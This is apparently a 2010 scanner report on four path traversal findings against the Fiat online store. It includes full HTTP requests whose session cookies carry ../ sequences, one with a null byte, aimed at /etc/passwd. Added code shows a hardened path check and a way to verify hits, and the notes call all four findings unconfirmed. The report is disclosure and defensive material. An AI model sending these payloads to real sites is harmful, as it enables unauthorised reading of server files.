Report generated by Hoyt LLC Research at Thu Sep 30 18:19:43 CDT 2010.



Cross Site Scripting Reports | Hoyt LLC Research

1. File path traversal

1.1. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388 [pgid cookie]

1.2. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch [sid cookie]

1.3. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View [sid cookie]

1.4. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch [sid cookie]



1. File path traversal
There are 4 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defense can be employed to prevent path traversal attacks:
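As an added illustration (editor's code, not part of the Hoyt report, Burp's output or Intershop's software), the block below puts the unsafe "directory prefix + user value" pattern from the issue background beside a layered check, and runs both over the cookie values actually captured in this report. BASE_DIR is a hypothetical per-session directory; the storefront's real layout is not on the page. The layering (reject anything that is not a bare token, canonicalise with the platform API, verify the canonical path stays under the base directory) is the editor's choice and not the report's own list.

```python
import os
import posixpath
import re
import urllib.parse

# Hypothetical data directory; the real application's layout is unknown.
BASE_DIR = "/opt/app/sessions"

# Cookie values as captured in the report's requests, URL-decoded the way a
# server decodes them. The pgid payload ends its target with %00 so that a
# C-style file API stops at /etc/passwd and never sees the trailing token.
PGID_PAYLOAD = urllib.parse.unquote(
    "DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA../../../../../../../../etc/passwd"
    "%00DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA"
)
SID_PAYLOAD = (
    "Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt"
    "../../../../../../../../etc/passwd"
)
GOOD_VALUE = "DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA"   # the untampered pgid token

# Layer 1 (editor's rule): a page/session token is a bare name from a tight
# character set. Dots are allowed because the real tokens contain one, so
# "." and ".." are excluded explicitly below.
TOKEN = re.compile(r"[A-Za-z0-9._-]+")


def vulnerable_path(user_value: str) -> str:
    """The unsafe pattern from the issue background: prefix + user value.

    Pure string work, no I/O. The split at NUL mimics a C-backed file API,
    and normpath collapses the ../ sequences the way the kernel would on open().
    """
    raw = (BASE_DIR + "/" + user_value).split("\x00", 1)[0]
    return posixpath.normpath(raw)


def within_base(user_value: str) -> bool:
    """Layers 2 and 3: canonicalise the joined path, require it under BASE_DIR.

    os.path.join throws BASE_DIR away when user_value is absolute, which is
    exactly why containment is checked on the canonical result, never on input.
    """
    if "\x00" in user_value:          # never legitimate; realpath would reject it
        return False
    base = os.path.realpath(BASE_DIR)
    resolved = os.path.realpath(os.path.join(BASE_DIR, user_value))
    return os.path.commonpath([base, resolved]) == base


def safe_path(user_value: str) -> str:
    """All layers together; raises ValueError instead of touching the filesystem."""
    if not TOKEN.fullmatch(user_value) or user_value in (".", ".."):
        raise ValueError(f"rejected token {user_value!r}")
    if not within_base(user_value):
        raise ValueError(f"token escapes {BASE_DIR}: {user_value!r}")
    return os.path.realpath(os.path.join(BASE_DIR, user_value))


if __name__ == "__main__":
    for label, value in (("pgid", PGID_PAYLOAD), ("sid", SID_PAYLOAD), ("clean", GOOD_VALUE)):
        print(f"{label:5} unsafe -> {vulnerable_path(value)}")
        try:
            print(f"{label:5} safe   -> {safe_path(value)}")
        except ValueError as exc:
            print(f"{label:5} safe   -> rejected ({exc})")
```

Both captured payloads resolve to /etc/passwd under the naive join; the %00 in the pgid value matters only for APIs that stop at a NUL byte, which is why the hardened version refuses NUL outright rather than relying on a later layer to notice it. The containment check is kept even though the token regex already blocks separators, so that loosening layer 1 later (for example to allow sub-directories) does not silently reopen the hole.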



1.1. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388 [pgid cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://store.fiat.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388

Issue detail

The pgid cookie is reported as vulnerable to path traversal, which would allow read access to arbitrary files on the server.

The payload DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA../../../../../../../../etc/passwd%00DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA was submitted in the pgid cookie: the legitimate token with a traversal sequence appended, followed by a %00 null byte so that a C-style file API would stop at /etc/passwd and ignore the trailing token. The scanner reports that the requested file was returned in the application's response.

Treat this as unconfirmed until checked by hand. The response excerpt captured below is the ordinary storefront template (Template Name: requis); no passwd-format line such as root:x:0:0: appears in it, and the server's Set-Cookie header resets pgid to the clean token DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA, which is consistent with the tampered value having been discarded rather than used in a file read. Confidence is Firm rather than Certain; a manual request with the tampered cookie, diffed against a baseline request with the untampered one, is needed before the High severity stands.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388 HTTP/1.1
Host: store.fiat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA../../../../../../../../etc/passwd%00DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; CICMR=1920x1200; SelectedLocaleID=en_GB; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.10.10.1285881681;

Response

HTTP/1.0 200 OK
Date: Thu, 30 Sep 2010 21:45:29 GMT
Server: Apache
Content-Length: 29361
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...
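The check a reviewer would run on a hit like 1.1 before accepting it, as an added example (editor's code, not the report's or Burp's): look in the body for /etc/passwd-shaped records, and look at what the server did with the tampered cookie. Both inputs are constructed: the first is assembled from the response excerpt captured above, the second is a made-up positive control showing what a genuine disclosure looks like inside an HTML page. A real verification would additionally diff against a baseline response to the same URL with the untampered cookie.

```python
import re
from typing import List, Optional, Tuple

# Cookie value exactly as sent in the report's request for instance 1.1.
PGID_PAYLOAD = ("DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA../../../../../../../../etc/passwd"
                "%00DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA")

# Constructed from the excerpt captured above: headers plus the start of the
# storefront template, which is all the report actually shows.
CAPTURED_RESPONSE = """HTTP/1.0 200 OK
Date: Thu, 30 Sep 2010 21:45:29 GMT
Server: Apache
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; path=/
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
"""

# Constructed positive control (sample records, not real accounts).
LEAKED_RESPONSE = """HTTP/1.0 200 OK
Content-Type: text/html;charset=utf-8

<html><body><pre>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
</pre></body></html>
"""

# One passwd record: name:password:uid:gid:gecos:home:shell (seven fields).
PASSWD_RECORD = re.compile(
    r"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M
)


def split_response(raw: str) -> Tuple[List[str], str]:
    """Separate header lines from the body at the first blank line."""
    head, _, body = raw.partition("\n\n")
    return head.splitlines(), body


def passwd_records(body: str) -> List[str]:
    """Lines in the body shaped like /etc/passwd entries."""
    return PASSWD_RECORD.findall(body)


def set_cookie_value(headers: List[str], name: str) -> Optional[str]:
    """Value the server assigned to cookie `name`, or None if it left it alone."""
    prefix = name + "="
    for line in headers:
        if line.lower().startswith("set-cookie:"):
            cookie = line.split(":", 1)[1].strip()
            if cookie.startswith(prefix):
                return cookie[len(prefix):].split(";", 1)[0]
    return None


def verdict(raw: str, cookie: str, payload: str) -> str:
    """Classify a scanner hit from its raw response.

    'confirmed'              several passwd records including root's are in the body
    'cookie reset by server' no records, and the server re-issued the cookie with a
                             value other than the payload (it discarded the input)
    'unconfirmed'            nothing either way; needs a baseline diff
    """
    headers, body = split_response(raw)
    records = passwd_records(body)
    if len(records) >= 2 and any(r.startswith("root:") for r in records):
        return "confirmed"
    reissued = set_cookie_value(headers, cookie)
    if reissued is not None and reissued != payload:
        return "cookie reset by server"
    return "unconfirmed"


if __name__ == "__main__":
    print("captured 1.1:", verdict(CAPTURED_RESPONSE, "pgid", PGID_PAYLOAD))
    print("positive control:", verdict(LEAKED_RESPONSE, "pgid", PGID_PAYLOAD))
```

Requiring more than one record and the root entry keeps a stray colon-separated line in ordinary HTML from passing as a disclosure; the cookie check only downgrades a hit, it never confirms one.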

1.2. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch [sid cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://store.fiat.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch

Issue detail

The sid cookie is reported as vulnerable to path traversal, which would allow read access to arbitrary files on the server.

The payload Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd was submitted in the sid cookie: the legitimate session token with a traversal sequence appended, this time without the %00 terminator used against pgid in 1.1. The scanner reports that the requested file was returned in the application's response.

The same caveat as for 1.1 applies. The captured response excerpt is the storefront template with no passwd-format content, and the server answers with a Set-Cookie that issues a brand-new sid, which is what a session layer does when it does not recognise the presented session identifier; it is not evidence of a file read. Confirm by hand, against a baseline response with the untampered cookie, before relying on the High severity.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-Dispatch HTTP/1.1
Host: store.fiat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; CICMR=1920x1200; SelectedLocaleID=en_GB; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.10.10.1285881681;

Response

HTTP/1.0 200 OK
Date: Thu, 30 Sep 2010 21:47:40 GMT
Server: Apache
Content-Length: 20744
Set-Cookie: sid=OCoio7cYBSUro_u9PVYgIx_YIKMQXWo2NFpZ-rDccps_-sxBP-46KoXm; path=/
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000C5o6fUep; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...

1.3. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View [sid cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://store.fiat.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View

Issue detail

The sid cookie is reported as vulnerable to path traversal, which would allow read access to arbitrary files on the server.

The payload Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd was submitted in the sid cookie, the same value as in 1.2 sent to ViewRequisition-View. The scanner reports that the requested file was returned in the application's response.

As in 1.2, the captured excerpt shows only the template and a freshly issued sid in Set-Cookie, so this instance needs the same manual confirmation before it is treated as a confirmed file read.

Request

GET /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisition-View HTTP/1.1
Host: store.fiat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; CICMR=1920x1200; SelectedLocaleID=en_GB; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.10.10.1285881681;

Response

HTTP/1.0 200 OK
Date: Thu, 30 Sep 2010 21:47:37 GMT
Server: Apache
Content-Length: 20724
Set-Cookie: sid=tOz-GIUf5fzyGMm6sZX8mC3frGXM5lgxuJyFQYLb_l3jQZ2WhhLmkbfh; path=/
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx00009Q176fd0; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...

1.4. https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch [sid cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://store.fiat.com
Path:   /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch

Issue detail

The sid cookie is reported as vulnerable to path traversal, which would allow read access to arbitrary files on the server.

The payload Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd was submitted in the sid cookie, here on the POST that submits the checkout address form rather than on a GET. The scanner reports that the requested file was returned in the application's response.

The response again carries the template and a freshly issued sid (and a new pgid) in Set-Cookie, with no passwd-format content in the captured excerpt, so the caveat from 1.1 and 1.2 applies here as well.

Request

POST /is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewRequisitionCheckout-Dispatch HTTP/1.1
Host: store.fiat.com
Connection: keep-alive
Referer: https://store.fiat.com/is-bin/INTERSHOP.enfinity/WFS/Fiat-EU-Site/en_GB/-/EUR/ViewData-Start/2100082388?JumpTarget=ViewRequisitionCheckout-ManageAddresses&=&=&=
Cache-Control: max-age=0
Origin: https://store.fiat.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=Wwj4Sfc0QA34SbuQpN76yV_0Q4HKtyoaV3iDEPDwEbnlEO-9afay-Opt../../../../../../../../etc/passwd; pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000dic4nPvA; SelectedLocaleID=en_GB; __utmz=1.1285881681.1.1.utmcsr=fiat.it|utmccn=(referral)|utmcmd=referral|utmcct=/cgi-bin/pbrand.dll/FIAT_ITALIA/home.jsp; __utma=1.751045137.1285881681.1285881681.1285881681.1; __utmc=1; __utmb=1.6.10.1285881681; CICMR=1920x1200
Content-Length: 583

InvoiceToAddressForm_Title=Herr&InvoiceToAddressForm_FirstName=&InvoiceToAddressForm_SecondName=&InvoiceToAddressForm_LastName=&InvoiceToAddressForm_Company=&InvoiceToAddressForm_Street=&InvoiceToAddr
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 30 Sep 2010 22:27:14 GMT
Server: Apache
Content-Length: 20824
Set-Cookie: sid=3OXpOuOTyc3sOq820ifruktTxGzbxD690JWSY-RXllT0Y_sa7hvxs9Ft; path=/
Set-Cookie: pgid=DiEfO3uAdAtSR0Q4mgC.wupx0000CxrOZMYj; path=/
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template Name: requis
...[SNIP]...
<![CDATA[ */
/*
* put all global storefront related key value pairs here to minify global variables amount!
* - webroot: needed to set WebRoot for file references (e.g. images used within ajax functions)
* - webrootBranding: needed to set WebRoot for file references that are used for branding, it is set within BrandingH
...[SNIP]...
